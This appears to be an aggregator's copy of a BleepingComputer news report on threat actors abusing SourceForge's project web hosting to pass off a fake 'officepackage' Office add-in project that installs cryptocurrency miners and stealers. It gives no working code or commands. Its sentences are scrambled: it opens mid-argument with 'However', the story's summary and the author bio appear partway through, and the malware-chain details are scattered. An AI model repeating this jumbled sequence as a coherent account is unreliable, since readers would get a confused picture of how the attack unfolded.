However, when users search for office add-ins on Google Search (and other engines), they get results pointing to "officepackage.sourceforge.io," powered by a separate web hosting feature SourceForge gives to project owners. While the malicious project is no longer available on SourceForge, Kaspersky says the project had been indexed by search engines, bringing traffic from users searching for "office add-ins" or similar. The "officepackage" project presents itself as a collection of Office Add-in development tools, with its description and files being a copy of the legitimate Microsoft project 'Office-Addin-Scripts,' available on GitHub. SourceForge.net is a legitimate software hosting and distribution platform that also supports version control, bug tracking, and dedicated forums/wikis, making it very popular among open-source project communities. Users are recommended to only download software from trusted publishers who they can verify, prefer the official project channels (in this case GitHub), and scan all downloaded files with an up-to-date AV tool before execution. Threat actors are abusing SourceForge to distribute fake Microsoft add-ins that install malware on victims' computers to both mine and steal cryptocurrency. Bill Toulas Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks. The script performs checks to determine whether it runs on a simulated environment and what antivirus products are active, and then downloads another batch script (confvz.bat) and unpacks the RAR archive. Although its open project submission model gives plenty of margin for abuse, actually seeing malware distributed through it is a rare occurrence.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Tue, 08 Apr 2025 20:55:12 +0000